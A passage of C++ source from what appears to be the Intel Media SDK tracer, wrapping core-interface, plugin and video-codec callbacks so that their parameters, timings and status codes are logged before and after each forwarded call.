*src)); Timer t; mfxStatus status = (*proc) (pthis, dst, size, src); std::string elapsed = TimeToString(t.GetTime()); Log::WriteLog(">> callback: mfxCoreInterface::CopyBuffer called"); Log::WriteLog("callback: mfxCoreInterface::CopyBuffer(" + elapsed + ", " + context.dump_mfxStatus("status", status) + ") - \n\n"); return status; } catch (std::exception& e) { std::cerr << "Exception: " << e.what() << '\n'; return MFX_ERR_ABORTED; } } mfxStatus mfxCoreInterface_MapOpaqueSurface(mfxHDL _pthis, mfxU32 num, mfxU32 type, mfxFrameSurface1 **op_surf) { try { DumpContext context; context.context = DUMPCONTEXT_MFX; mfxLoader *loader = (mfxLoader*)_pthis; if (!loader) return MFX_ERR_INVALID_HANDLE; mfxHDL pthis = loader->callbacks[emfxCoreInterface_MapOpaqueSurface_tracer][1]; Log::WriteLog("callback: mfxCoreInterface::MapOpaqueSurface(mfxHDL pthis=" + ToString(pthis) + ", mfxU32 num=" + ToString(num) + ", mfxU32 type=" + ToString(type) + ", mfxFrameSurface1 **op_surf=" + ToString(op_surf) + ") +"); fmfxCoreInterface_MapOpaqueSurface proc = (fmfxCoreInterface_MapOpaqueSurface)loader->callbacks[emfxCoreInterface_MapOpaqueSurface_tracer][0]; if (!proc) return MFX_ERR_INVALID_HANDLE; Log::WriteLog(context.dump("pthis", pthis)); if (num && op_surf) for (mfxU32 i = 0; i < num; i++) if (op_surf[i]) Log::WriteLog(context.dump("op_surf[" + ToString(i) + "]=", *op_surf[i])); Timer t; mfxStatus status = (*proc) (pthis, num, type, op_surf); std::string elapsed = TimeToString(t.GetTime()); Log::WriteLog(">> callback: mfxCoreInterface::MapOpaqueSurface called"); if (num && op_surf) for (mfxU32 i = 0; i < num; i++) if (op_surf[i]) Log::WriteLog(context.dump("op_surf[" + ToString(i) + "]=", *op_surf[i])); Log::WriteLog("callback: mfxCoreInterface::MapOpaqueSurface(" + elapsed + ", " + context.dump_mfxStatus("status", status) + ") - \n\n"); return status; } catch (std::exception& e) { std::cerr << "Exception: " << e.what() << '\n'; return MFX_ERR_ABORTED; } } mfxStatus mfxCoreInterface_UnmapOpaqueSurface(mfxHDL _pthis, mfxU32 num, mfxU32 type, mfxFrameSurface1 **op_surf) { try { DumpContext context; context.context = DUMPCONTEXT_MFX; mfxLoader *loader = (mfxLoader*)_pthis; if (!loader) return MFX_ERR_INVALID_HANDLE; mfxHDL pthis = loader->callbacks[emfxCoreInterface_UnmapOpaqueSurface_tracer][1]; Log::WriteLog("callback: mfxCoreInterface::UnmapOpaqueSurface(mfxHDL pthis=" + ToString(pthis) + ", mfxU32 num=" + ToString(num) + ", mfxU32 type=" + ToString(type) + ", mfxFrameSurface1 **op_surf=" + ToString(op_surf) + ") +"); fmfxCoreInterface_UnmapOpaqueSurface proc = (fmfxCoreInterface_UnmapOpaqueSurface)loader->callbacks[emfxCoreInterface_UnmapOpaqueSurface_tracer][0]; if (!proc) return MFX_ERR_INVALID_HANDLE; Log::WriteLog(context.dump("pthis", pthis)); if (num && op_surf) for (mfxU32 i = 0; i < num; i++) if (op_surf[i]) Log::WriteLog(context.dump("op_surf[" + ToString(i) + "]=", *op_surf[i])); Timer t; mfxStatus status = (*proc) (pthis, num, type, op_surf); std::string elapsed = TimeToString(t.GetTime()); Log::WriteLog(">> callback: mfxCoreInterface::UnmapOpaqueSurface called"); if (num && op_surf) for (mfxU32 i = 0; i < num; i++) if (op_surf[i]) Log::WriteLog(context.dump("op_surf[" + ToString(i) + "]=", *op_surf[i])); Log::WriteLog("callback: mfxCoreInterface::UnmapOpaqueSurface(" + elapsed + ", " + context.dump_mfxStatus("status", status) + ") - \n\n"); return status; } catch (std::exception& e) { std::cerr << "Exception: " << e.what() << '\n'; return MFX_ERR_ABORTED; } } mfxStatus mfxCoreInterface_GetRealSurface(mfxHDL _pthis, mfxFrameSurface1 *op_surf, mfxFrameSurface1 **surf) { try { DumpContext context; context.context = DUMPCONTEXT_MFX; mfxLoader *loader = (mfxLoader*)_pthis; if (!loader) return MFX_ERR_INVALID_HANDLE; mfxHDL pthis = loader->callbacks[emfxCoreInterface_GetRealSurface_tracer][1]; Log::WriteLog("callback: mfxCoreInterface::GetRealSurface(mfxHDL pthis=" + ToString(pthis) + ", mfxFrameSurface1 *op_surf=" + ToString(op_surf) + ", mfxFrameSurface1 **surf=" + ToString(surf) + ") +"); fmfxCoreInterface_GetRealSurface proc = (fmfxCoreInterface_GetRealSurface)loader->callbacks[emfxCoreInterface_GetRealSurface_tracer][0]; if (!proc) return MFX_ERR_INVALID_HANDLE; Log::WriteLog(context.dump("pthis", pthis)); if (op_surf) Log::WriteLog(context.dump("op_surf", *op_surf)); Timer t; mfxStatus status = (*proc) (pthis, op_surf, surf); std::string elapsed = TimeToString(t.GetTime()); Log::WriteLog(">> callback: mfxCoreInterface::GetRealSurface called"); if (surf && *surf) Log::WriteLog(context.dump("surf", **surf)); Log::WriteLog("callback: mfxCoreInterface::GetRealSurface(" + elapsed + ", " + context.dump_mfxStatus("status", status) + ") - \n\n"); return status; } catch (std::exception& e) { std::cerr << "Exception: " << e.what() << '\n'; return MFX_ERR_ABORTED; } } mfxStatus mfxCoreInterface_GetOpaqueSurface(mfxHDL _pthis, mfxFrameSurface1 *surf, mfxFrameSurface1 **op_surf) { try { DumpContext context; context.context = DUMPCONTEXT_MFX; mfxLoader *loader = (mfxLoader*)_pthis; if (!loader) return MFX_ERR_INVALID_HANDLE; mfxHDL pthis = loader->callbacks[emfxCoreInterface_GetOpaqueSurface_tracer][1]; Log::WriteLog("callback: mfxCoreInterface::GetOpaqueSurface(mfxHDL pthis=" + ToString(pthis) + ", mfxFrameSurface1 **surf=" + ToString(surf) + ", mfxFrameSurface1 *op_surf=" + ToString(op_surf) + ") +"); fmfxCoreInterface_GetOpaqueSurface proc = (fmfxCoreInterface_GetOpaqueSurface)loader->callbacks[emfxCoreInterface_GetOpaqueSurface_tracer][0]; if (!proc) return MFX_ERR_INVALID_HANDLE; Log::WriteLog(context.dump("pthis", pthis)); if (surf) Log::WriteLog(context.dump("surf", *surf)); Timer t; mfxStatus status = (*proc) (pthis, surf, op_surf); std::string elapsed = TimeToString(t.GetTime()); Log::WriteLog(">> callback: mfxCoreInterface::GetOpaqueSurface called"); if (op_surf && *op_surf) Log::WriteLog(context.dump("op_surf", **op_surf)); Log::WriteLog("callback: mfxCoreInterface::GetOpaqueSurface(" + elapsed + ", " + context.dump_mfxStatus("status", status) + ") - \n\n"); return status; } catch (std::exception& e) { std::cerr << "Exception: " << e.what() << '\n'; return MFX_ERR_ABORTED; } } mfxStatus mfxCoreInterface_CreateAccelerationDevice(mfxHDL _pthis, mfxHandleType type, mfxHDL *handle) { try { DumpContext context; context.context = DUMPCONTEXT_MFX; mfxLoader *loader = (mfxLoader*)_pthis; if (!loader) return MFX_ERR_INVALID_HANDLE; mfxHDL pthis = loader->callbacks[emfxCoreInterface_CreateAccelerationDevice_tracer][1]; Log::WriteLog("callback: mfxCoreInterface::CreateAccelerationDevice(mfxHDL pthis=" + ToString(pthis) + ", mfxHandleType type=" + ToString(type) + ", mfxHDL *handle=" + ToString(handle) + ") +"); fmfxCoreInterface_CreateAccelerationDevice proc = (fmfxCoreInterface_CreateAccelerationDevice)loader->callbacks[emfxCoreInterface_CreateAccelerationDevice_tracer][0]; if (!proc) return MFX_ERR_INVALID_HANDLE; Log::WriteLog(context.dump("pthis", pthis)); if (handle) Log::WriteLog(context.dump("handle", *handle)); Timer t; mfxStatus status = (*proc) (pthis, type, handle); std::string elapsed = TimeToString(t.GetTime()); Log::WriteLog(">> callback: mfxCoreInterface::CreateAccelerationDevice called"); if (handle) Log::WriteLog(context.dump("handle", *handle)); Log::WriteLog("callback: mfxCoreInterface::CreateAccelerationDevice(" + elapsed + ", " + context.dump_mfxStatus("status", status) + ") - \n\n"); return status; } catch (std::exception& e) { std::cerr << "Exception: " << e.what() << '\n'; return MFX_ERR_ABORTED; } } mfxStatus mfxCoreInterface_GetFrameHandle(mfxHDL _pthis, mfxFrameData *fd, mfxHDL *handle) { try { DumpContext context; context.context = DUMPCONTEXT_MFX; mfxLoader *loader = (mfxLoader*)_pthis; if (!loader) return MFX_ERR_INVALID_HANDLE; mfxHDL pthis = loader->callbacks[emfxCoreInterface_GetFrameHandle_tracer][1]; Log::WriteLog("callback: mfxCoreInterface::GetFrameHandle(mfxHDL pthis=" + ToString(pthis) + ", mfxFrameData *fd=" + ToString(fd) + ", mfxHDL *handle=" + ToString(handle) + ") +"); fmfxCoreInterface_GetFrameHandle proc = (fmfxCoreInterface_GetFrameHandle)loader->callbacks[emfxCoreInterface_GetFrameHandle_tracer][0]; if (!proc) return MFX_ERR_INVALID_HANDLE; Log::WriteLog(context.dump("pthis", pthis)); if (fd) Log::WriteLog(context.dump("fd", *fd)); if (handle) Log::WriteLog(context.dump("handle", *handle)); Timer t; mfxStatus status = (*proc) (pthis, fd, handle); std::string elapsed = TimeToString(t.GetTime()); Log::WriteLog(">> callback: mfxCoreInterface::GetFrameHandle called"); if (handle) Log::WriteLog(context.dump("handle", *handle)); Log::WriteLog("callback: mfxCoreInterface::GetFrameHandle(" + elapsed + ", " + context.dump_mfxStatus("status", status) + ") - \n\n"); return status; } catch (std::exception& e) { std::cerr << "Exception: " << e.what() << '\n'; return MFX_ERR_ABORTED; } } mfxStatus mfxCoreInterface_QueryPlatform(mfxHDL _pthis, mfxPlatform *platform) { try { DumpContext context; context.context = DUMPCONTEXT_MFX; mfxLoader *loader = (mfxLoader*)_pthis; if (!loader) return MFX_ERR_INVALID_HANDLE; mfxHDL pthis = loader->callbacks[emfxCoreInterface_QueryPlatform_tracer][1]; Log::WriteLog("callback: mfxCoreInterface::QueryPlatform(mfxHDL pthis=" + ToString(pthis) + ", mfxPlatform *platform=" + ToString(platform) + ") +"); fmfxCoreInterface_QueryPlatform proc = (fmfxCoreInterface_QueryPlatform)loader->callbacks[emfxCoreInterface_QueryPlatform_tracer][0]; if (!proc) return MFX_ERR_INVALID_HANDLE; Log::WriteLog(context.dump("pthis", pthis)); if (platform) Log::WriteLog(context.dump("platform", *platform)); Timer t; mfxStatus status = (*proc) (pthis, platform); std::string elapsed = TimeToString(t.GetTime()); Log::WriteLog(">> callback: mfxCoreInterface::QueryPlatform called"); if (platform) Log::WriteLog(context.dump("platform", *platform)); Log::WriteLog("callback: mfxCoreInterface::QueryPlatform(" + elapsed + ", " + context.dump_mfxStatus("status", status) + ") - \n\n"); return status; } catch (std::exception& e) { std::cerr << "Exception: " << e.what() << '\n'; return MFX_ERR_ABORTED; } } mfxStatus mfxPlugin_PluginInit(mfxHDL _pthis, mfxCoreInterface *core) { try { DumpContext context; context.context = DUMPCONTEXT_MFX; mfxLoader::Plugin* pCtx = ((mfxLoader::Plugin*)_pthis); if (!pCtx) return MFX_ERR_INVALID_HANDLE; mfxHDL pthis = pCtx->callbacks[emfxPlugin_PluginInit_tracer][1]; Log::WriteLog("callback: mfxPlugin::PluginInit(mfxHDL pthis=" + ToString(pthis) + ", mfxCoreInterface *core=" + ToString(core) + ") +"); fmfxPlugin_PluginInit proc = (fmfxPlugin_PluginInit)pCtx->callbacks[emfxPlugin_PluginInit_tracer][0]; if (!proc) return MFX_ERR_INVALID_HANDLE; Log::WriteLog(context.dump("pthis", pthis)); if (core) Log::WriteLog(context.dump("core", *core)); Timer t; mfxStatus status = (*proc) (pthis, core); std::string elapsed = TimeToString(t.GetTime()); Log::WriteLog(">> callback: mfxPlugin::PluginInit called"); Log::WriteLog("callback: mfxPlugin::PluginInit(" + elapsed + ", " + context.dump_mfxStatus("status", status) + ") - \n\n"); if (core && status == MFX_ERR_NONE) { INIT_CALLBACK_BACKUP(pCtx->pLoaderBase->callbacks); SET_CALLBACK(mfxFrameAllocator, core->FrameAllocator., Alloc, core->FrameAllocator.pthis); SET_CALLBACK(mfxFrameAllocator, core->FrameAllocator., Lock, core->FrameAllocator.pthis); SET_CALLBACK(mfxFrameAllocator, core->FrameAllocator., Unlock, core->FrameAllocator.pthis); SET_CALLBACK(mfxFrameAllocator, core->FrameAllocator., GetHDL, core->FrameAllocator.pthis); SET_CALLBACK(mfxFrameAllocator, core->FrameAllocator., Free, core->FrameAllocator.pthis); if (core->FrameAllocator.pthis) core->FrameAllocator.pthis = pCtx->pLoaderBase; SET_CALLBACK(mfxCoreInterface, core->, GetCoreParam, core->pthis); SET_CALLBACK(mfxCoreInterface, core->, GetHandle, core->pthis); SET_CALLBACK(mfxCoreInterface, core->, IncreaseReference, core->pthis); SET_CALLBACK(mfxCoreInterface, core->, DecreaseReference, core->pthis); SET_CALLBACK(mfxCoreInterface, core->, CopyFrame, core->pthis); SET_CALLBACK(mfxCoreInterface, core->, CopyBuffer, core->pthis); SET_CALLBACK(mfxCoreInterface, core->, MapOpaqueSurface, core->pthis); SET_CALLBACK(mfxCoreInterface, core->, UnmapOpaqueSurface, core->pthis); SET_CALLBACK(mfxCoreInterface, core->, GetRealSurface, core->pthis); SET_CALLBACK(mfxCoreInterface, core->, GetOpaqueSurface, core->pthis); SET_CALLBACK(mfxCoreInterface, core->, CreateAccelerationDevice, core->pthis); SET_CALLBACK(mfxCoreInterface, core->, GetFrameHandle, core->pthis); SET_CALLBACK(mfxCoreInterface, core->, QueryPlatform, core->pthis); if (core->pthis) core->pthis = pCtx->pLoaderBase; } return status; } catch (std::exception& e) { std::cerr << "Exception: " << e.what() << '\n'; return MFX_ERR_ABORTED; } } mfxStatus mfxPlugin_PluginClose(mfxHDL _pthis) { try { DumpContext context; context.context = DUMPCONTEXT_MFX; mfxLoader::Plugin* pCtx = ((mfxLoader::Plugin*)_pthis); if (!pCtx) return MFX_ERR_INVALID_HANDLE; mfxHDL pthis = pCtx->callbacks[emfxPlugin_PluginClose_tracer][1]; Log::WriteLog("callback: mfxPlugin::PluginClose(mfxHDL pthis=" + ToString(pthis) + ") +"); fmfxPlugin_PluginClose proc = (fmfxPlugin_PluginClose)pCtx->callbacks[emfxPlugin_PluginClose_tracer][0]; if (!proc) return MFX_ERR_INVALID_HANDLE; Log::WriteLog(context.dump("pthis", pthis)); Timer t; mfxStatus status = (*proc) (pthis); std::string elapsed = TimeToString(t.GetTime()); Log::WriteLog(">> callback: mfxPlugin::PluginClose called"); Log::WriteLog("callback: mfxPlugin::PluginClose(" + elapsed + ", " + context.dump_mfxStatus("status", status) + ") - \n\n"); return status; } catch (std::exception& e) { std::cerr << "Exception: " << e.what() << '\n'; return MFX_ERR_ABORTED; } } mfxStatus mfxPlugin_GetPluginParam(mfxHDL _pthis, mfxPluginParam *par) { try { DumpContext context; context.context = DUMPCONTEXT_MFX; mfxLoader::Plugin* pCtx = ((mfxLoader::Plugin*)_pthis); if (!pCtx) return MFX_ERR_INVALID_HANDLE; mfxHDL pthis = pCtx->callbacks[emfxPlugin_GetPluginParam_tracer][1]; Log::WriteLog("callback: mfxPlugin::GetPluginParam(mfxHDL pthis=" + ToString(pthis) + ", mfxPluginParam *par=" + ToString(par) + ") +"); fmfxPlugin_GetPluginParam proc = (fmfxPlugin_GetPluginParam)pCtx->callbacks[emfxPlugin_GetPluginParam_tracer][0]; if (!proc) return MFX_ERR_INVALID_HANDLE; Log::WriteLog(context.dump("pthis", pthis)); if (par) Log::WriteLog(context.dump("par", *par)); Timer t; mfxStatus status = (*proc) (pthis, par); std::string elapsed = TimeToString(t.GetTime()); Log::WriteLog(">> callback: mfxPlugin::GetPluginParam called"); if (par) Log::WriteLog(context.dump("par", *par)); Log::WriteLog("callback: mfxPlugin::GetPluginParam(" + elapsed + ", " + context.dump_mfxStatus("status", status) + ") - \n\n"); return status; } catch (std::exception& e) { std::cerr << "Exception: " << e.what() << '\n'; return MFX_ERR_ABORTED; } } mfxStatus mfxPlugin_Submit(mfxHDL _pthis, const mfxHDL *in, mfxU32 in_num, const mfxHDL *out, mfxU32 out_num, mfxThreadTask *task) { try { DumpContext context; context.context = DUMPCONTEXT_MFX; mfxLoader::Plugin* pCtx = ((mfxLoader::Plugin*)_pthis); if (!pCtx) return MFX_ERR_INVALID_HANDLE; mfxHDL pthis = pCtx->callbacks[emfxPlugin_Submit_tracer][1]; Log::WriteLog("callback: mfxPlugin::Submit(mfxHDL pthis=" + ToString(pthis) + ", const mfxHDL *in=" + ToString(in) + ", mfxU32 in_num=" + ToString(in_num) + ", const mfxHDL *out=" + ToString(out) + ", mfxU32 out_num=" + ToString(out_num) + ", mfxThreadTask *task=" + ToString(task) + ") +"); fmfxPlugin_Submit proc = (fmfxPlugin_Submit)pCtx->callbacks[emfxPlugin_Submit_tracer][0]; if (!proc) return MFX_ERR_INVALID_HANDLE; Log::WriteLog(context.dump("pthis", pthis)); if (task) Log::WriteLog(context.dump("task", *task)); Timer t; mfxStatus status = (*proc) (pthis, in, in_num, out, out_num, task); std::string elapsed = TimeToString(t.GetTime()); Log::WriteLog(">> callback: mfxPlugin::Submit called"); if (task) Log::WriteLog(context.dump("task", *task)); Log::WriteLog("callback: mfxPlugin::Submit(" + elapsed + ", " + context.dump_mfxStatus("status", status) + ") - \n\n"); return status; } catch (std::exception& e) { std::cerr << "Exception: " << e.what() << '\n'; return MFX_ERR_ABORTED; } } mfxStatus mfxPlugin_Execute(mfxHDL _pthis, mfxThreadTask task, mfxU32 uid_p, mfxU32 uid_a) { try { DumpContext context; context.context = DUMPCONTEXT_MFX; mfxLoader::Plugin* pCtx = ((mfxLoader::Plugin*)_pthis); if (!pCtx) return MFX_ERR_INVALID_HANDLE; mfxHDL pthis = pCtx->callbacks[emfxPlugin_Execute_tracer][1]; Log::WriteLog("callback: mfxPlugin::Execute(mfxHDL pthis=" + ToString(pthis) + ", mfxThreadTask task=" + ToString(task) + ", mfxU32 uid_p=" + ToString(uid_p) + ", mfxU32 uid_a=" + ToString(uid_a) + ") +"); fmfxPlugin_Execute proc = (fmfxPlugin_Execute)pCtx->callbacks[emfxPlugin_Execute_tracer][0]; if (!proc) return MFX_ERR_INVALID_HANDLE; Log::WriteLog(context.dump("pthis", pthis)); Timer t; mfxStatus status = (*proc) (pthis, task, uid_p, uid_a); std::string elapsed = TimeToString(t.GetTime()); Log::WriteLog(">> callback: mfxPlugin::Execute called"); Log::WriteLog("callback: mfxPlugin::Execute(" + elapsed + ", " + context.dump_mfxStatus("status", status) + ") - \n\n"); return status; } catch (std::exception& e) { std::cerr << "Exception: " << e.what() << '\n'; return MFX_ERR_ABORTED; } } mfxStatus mfxPlugin_FreeResources(mfxHDL _pthis, mfxThreadTask task, mfxStatus sts) { try { DumpContext context; context.context = DUMPCONTEXT_MFX; mfxLoader::Plugin* pCtx = ((mfxLoader::Plugin*)_pthis); if (!pCtx) return MFX_ERR_INVALID_HANDLE; mfxHDL pthis = pCtx->callbacks[emfxPlugin_FreeResources_tracer][1]; Log::WriteLog("callback: mfxPlugin::FreeResources(mfxHDL pthis=" + ToString(pthis) + ", mfxThreadTask task=" + ToString(task) + ", mfxStatus sts=" + ToString(sts) + ") +"); fmfxPlugin_FreeResources proc = (fmfxPlugin_FreeResources)pCtx->callbacks[emfxPlugin_FreeResources_tracer][0]; if (!proc) return MFX_ERR_INVALID_HANDLE; Log::WriteLog(context.dump("pthis", pthis)); Timer t; mfxStatus status = (*proc) (pthis, task, sts); std::string elapsed = TimeToString(t.GetTime()); Log::WriteLog(">> callback: mfxPlugin::FreeResources called"); Log::WriteLog("callback: mfxPlugin::FreeResources(" + elapsed + ", " + context.dump_mfxStatus("status", status) + ") - \n\n"); return status; } catch (std::exception& e) { std::cerr << "Exception: " << e.what() << '\n'; return MFX_ERR_ABORTED; } } inline bool IsVPPPlugin(mfxLoader::Plugin* pCtx) { return ((mfxU8*)pCtx - (mfxU8*)pCtx->pLoaderBase) == ((mfxU8*)pCtx->pLoaderBase - (mfxU8*)&pCtx->pLoaderBase->plugin[MFX_PLUGINTYPE_VIDEO_VPP]); } mfxStatus mfxVideoCodecPlugin_Query(mfxHDL _pthis, mfxVideoParam *in, mfxVideoParam *out) { try { DumpContext context; mfxLoader::Plugin* pCtx = ((mfxLoader::Plugin*)_pthis); if (!pCtx) return MFX_ERR_INVALID_HANDLE; mfxHDL pthis = pCtx->callbacks[emfxVideoCodecPlugin_Query_tracer][1]; context.context = IsVPPPlugin(pCtx) ? DUMPCONTEXT_VPP : DUMPCONTEXT_MFX; Log::WriteLog("callback: mfxVideoCodecPlugin::Query(mfxHDL pthis=" + ToString(pthis) + ", mfxVideoParam *in=" + ToString(in) + ", mfxVideoParam *out=" + ToString(out) + ") +"); fmfxVideoCodecPlugin_Query proc = (fmfxVideoCodecPlugin_Query)pCtx->callbacks[emfxVideoCodecPlugin_Query_tracer][0]; if (!proc) return MFX_ERR_INVALID_HANDLE; Log::WriteLog(context.dump("pthis", pthis)); if (in) Log::WriteLog(context.dump("in", *in)); if (out) Log::WriteLog(context.dump("out", *out)); Timer t; mfxStatus status = (*proc) (pthis, in, out); std::string elapsed = TimeToString(t.GetTime()); Log::WriteLog(">> callback: mfxVideoCodecPlugin::Query called"); if (out) Log::WriteLog(context.dump("out", *out)); Log::WriteLog("callback: mfxVideoCodecPlugin::Query(" + elapsed + ", " + context.dump_mfxStatus("status", status) + ") - \n\n"); return status; } catch (std::exception& e) { std::cerr << "Exception: " << e.what() << '\n'; return MFX_ERR_ABORTED; } } mfxStatus mfxVideoCodecPlugin_QueryIOSurf(mfxHDL _pthis, mfxVideoParam *par, mfxFrameAllocRequest *in, mfxFrameAllocRequest *out) { try { DumpContext context; mfxLoader::Plugin* pCtx = ((mfxLoader::Plugin*)_pthis); if (!pCtx) return MFX_ERR_INVALID_HANDLE; mfxHDL pthis = pCtx->callbacks[emfxVideoCodecPlugin_QueryIOSurf_tracer][1]; context.context = IsVPPPlugin(pCtx) ? DUMPCONTEXT_VPP : DUMPCONTEXT_MFX; Log::WriteLog("callback: mfxVideoCodecPlugin::QueryIOSurf(mfxHDL pthis=" + ToString(pthis) + ", mfxVideoParam *par=" + ToString(par) + ", mfxFrameAllocRequest *in=" + ToString(in) + ", mfxFrameAllocRequest *out=" + ToString(out) + ") +"); fmfxVideoCodecPlugin_QueryIOSurf proc = (fmfxVideoCodecPlugin_QueryIOSurf)pCtx->callbacks[emfxVideoCodecPlugin_QueryIOSurf_tracer][0]; if (!proc) return MFX_ERR_INVALID_HANDLE; Log::WriteLog(context.dump("pthis", pthis)); if (par) Log::WriteLog(context.dump("par", *par)); if (in) Log::WriteLog(context.dump("in", *in)); if (out) Log::WriteLog(context.dump("out", *out)); Timer t; mfxStatus status = (*proc) (pthis, par, in, out); std::string elapsed = TimeToString(t.GetTime()); Log::WriteLog(">> callback: mfxVideoCodecPlugin::QueryIOSurf called"); if (in) Log::WriteLog(context.dump("in", *in)); if (out) Log::WriteLog(context.dump("out", *out)); Log::WriteLog("callback: mfxVideoCodecPlugin::QueryIOSurf(" + elapsed + ", " + context.dump_mfxStatus("status", status) + ") - \n\n"); return status; } catch (std::exception& e) { std::cerr << "Exception: " << e.what() << '\n'; return MFX_ERR_ABORTED; } } mfxStatus mfxVideoCodecPlugin_Init(mfxHDL _pthis, mfxVideoParam *par) { try { DumpContext context; mfxLoader::Plugin* pCtx = ((mfxLoader::Plugin*)_pthis); if (!pCtx) return MFX_ERR_INVALID_HANDLE; mfxHDL pthis = pCtx->callbacks[emfxVideoCodecPlugin_Init_tracer][1]; context.context = IsVPPPlugin(pCtx) ? DUMPCONTEXT_VPP : DUMPCONTEXT_MFX; Log::WriteLog("callback: mfxVideoCodecPlugin::Init(mfxHDL pthis=" + ToString(pthis) + ", mfxVideoParam *par" + ToString(par) + ") +"); fmfxVideoCodecPlugin_Init proc = (fmfxVideoCodecPlugin_Init)pCtx->callbacks[emfxVideoCodecPlugin_Init_tracer][0]; if (!proc) return MFX_ERR_INVALID_HANDLE; Log::WriteLog(context.dump("pthis", pthis)); if (par) Log::WriteLog(context.dump("par", *par)); Timer t; mfxStatus status = (*proc) (pthis, par); std::string elapsed = TimeToString(t.GetTime()); Log::WriteLog(">> callback: mfxVideoCodecPlugin::Init called"); Log::WriteLog("callback: mfxVideoCodecPlugin::Init(" + elapsed + ", " + context.dump_mfxStatus("status", status) + ") - \n\n"); return status; } catch (std::exception& e) { std::cerr << "Exception: " << e.what() << '\n'; return MFX_ERR_ABORTED; } } mfxStatus mfxVideoCodecPlugin_Reset(mfxHDL _pthis, mfxVideoParam *par) { try { DumpContext context; mfxLoader::Plugin* pCtx = ((mfxLoader::Plugin*)_pthis); if (!pCtx) return MFX_ERR_INVALID_HANDLE; mfxHDL pthis = pCtx->callbacks[emfxVideoCodecPlugin_Reset_tracer][1]; context.context = IsVPPPlugin(pCtx) ? DUMPCONTEXT_VPP : DUMPCONTEXT_MFX; Log::WriteLog("callback: mfxVideoCodecPlugin::Reset(mfxHDL pthis=" + ToString(pthis) + ", mfxVideoParam *par" + ToString(par) + ") +"); fmfxVideoCodecPlugin_Reset proc = (fmfxVideoCodecPlugin_Reset)pCtx->callbacks[emfxVideoCodecPlugin_Reset_tracer][0]; if (!proc) return MFX_ERR_INVALID_HANDLE; Log::WriteLog(context.dump("pthis", pthis)); if (par) Log::WriteLog(context.dump("par", *par)); Timer t; mfxStatus status = (*proc) (pthis, par); std::string elapsed = TimeToString(t.GetTime()); Log::WriteLog(">> callback: mfxVideoCodecPlugin::Reset called"); Log::WriteLog("callback: mfxVideoCodecPlugin::Reset(" + elapsed + ", " + context.dump_mfxStatus("status", status) + ") - \n\n"); return status; } catch (std::exception& e) { std::cerr << "Exception: " << e.what() << '\n'; return MFX_ERR_ABORTED; } } mfxStatus mfxVideoCodecPlugin_Close(mfxHDL _pthis) { try { DumpContext context; mfxLoader::Plugin* pCtx = ((mfxLoader::Plugin*)_pthis); if (!pCtx) return MFX_ERR_INVALID_HANDLE; mfxHDL pthis = pCtx->callbacks[emfxVideoCodecPlugin_Close_tracer][1]; context.context = IsVPPPlugin(pCtx) ? DUMPCONTEXT_VPP : DUMPCONTEXT_MFX; Log::WriteLog("callback: mfxVideoCodecPlugin::Close(mfxHDL pthis=" + ToString(pthis) + ") +"); fmfxVideoCodecPlugin_Close proc = (fmfxVideoCodecPlugin_Close)pCtx->callbacks[emfxVideoCodecPlugin_Close_tracer][0]; if (!proc) return MFX_ERR_INVALID_HANDLE; Log::WriteLog(context.dump("pthis", pthis)); Timer t; mfxStatus status = (*proc) (pthis); std::string elapsed = TimeToString(t.GetTime()); Log::WriteLog(">> callback: mfxVideoCodecPlugin::Close called"); Log::WriteLog("callback: mfxVideoCodecPlugin::Close(" + elapsed + ", " + context.dump_mfxStatus("status", status) + ") - \n\n"); return status; } catch (std::exception& e) { std::cerr << "Exception: " << e.what() << '\n'; return MFX_ERR_ABORTED; } } mfxStatus mfxVideoCodecPlugin_GetVideoParam(mfxHDL _pthis, mfxVideoParam *par) { try { DumpContext context; mfxLoader::Plugin* pCtx = ((mfxLoader::Plugin*)_pthis); if (!pCtx) return MFX_ERR_INVALID_HANDLE; mfxHDL pthis = pCtx->callbacks[emfxVideoCodecPlugin_GetVideoParam_tracer][1]; context.context = IsVPPPlugin(pCtx) ? DUMPCONTEXT_VPP : DUMPCONTEXT_MFX; Log::WriteLog("callback: mfxVideoCodecPlugin::GetVideoParam(mfxHDL pthis=" + ToString(pthis) + ", mfxVideoParam *par" + ToString(par) + ") +"); fmfxVideoCodecPlugin_GetVideoParam proc = (fmfxVideoCodecPlugin_GetVideoParam)pCtx->callbacks[emfxVideoCodecPlugin_GetVideoParam_tracer][0]; if (!proc) return MFX_ERR_INVALID_HANDLE; Log::WriteLog(context.dump("pthis", pthis)); if (par) Log::WriteLog(context.dump("par", *par)); Timer t; mfxStatus status = (*proc) (pthis, par); std::string elapsed = TimeToString(t.GetTime()); Log::WriteLog(">> callback: mfxVideoCodecPlugin::GetVideoParam called"); if (par) Log::WriteLog(context.dump("par", *par)); Log::WriteLog("callback: mfxVideoCodecPlugin::GetVideoParam(" + elapsed + ", " + context.dump_mfxStatus("status", status) + ") - \n\n"); return status; } catch (std::exception& e) { std::cerr << "Exception: " << e.what() << '\n'; return MFX_ERR_ABORTED; } } mfxStatus mfxVideoCodecPlugin_EncodeFrameSubmit(mfxHDL _pthis, mfxEncodeCtrl *ctrl, mfxFrameSurface1 *surface, mfxBitstream *bs, mfxThreadTask *task) { try { DumpContext context; mfxLoader::Plugin* pCtx = ((mfxLoader::Plugin*)_pthis); if (!pCtx) return MFX_ERR_INVALID_HANDLE; mfxHDL pthis = pCtx->callbacks[emfxVideoCodecPlugin_EncodeFrameSubmit_tracer][1]; context.context = DUMPCONTEXT_MFX; Log::WriteLog("callback: mfxVideoCodecPlugin::EncodeFrameSubmit(mfxHDL pthis=" + ToString(pthis) + ", mfxEncodeCtrl *ctrl=" + ToString(ctrl) + ", mfxFrameSurface1 *surface=" + ToString(surface) + ", mfxBitstream *bs=" + ToString(bs) + ", mfxThreadTask *task=" + ToString(task) + ") +"); fmfxVideoCodecPlugin_EncodeFrameSubmit proc = (fmfxVideoCodecPlugin_EncodeFrameSubmit)pCtx->callbacks[emfxVideoCodecPlugin_EncodeFrameSubmit_tracer][0]; if (!proc) return MFX_ERR_INVALID_HANDLE; Log::WriteLog(context.dump("pthis", pthis)); if (ctrl) Log::WriteLog(context.dump("ctrl", *ctrl)); if (surface) Log::WriteLog(context.dump("surface", *surface)); if (bs) Log::WriteLog(context.dump("bs", *bs)); if (task) Log::WriteLog(context.dump("bs", *task)); Timer t; mfxStatus status = (*proc) (pthis, ctrl, surface, bs, task); std::string elapsed = TimeToString(t.GetTime()); Log::WriteLog(">> callback: mfxVideoCodecPlugin::EncodeFrameSubmit called"); if (task) Log::WriteLog(context.dump("task", *task)); Log::WriteLog("callback: 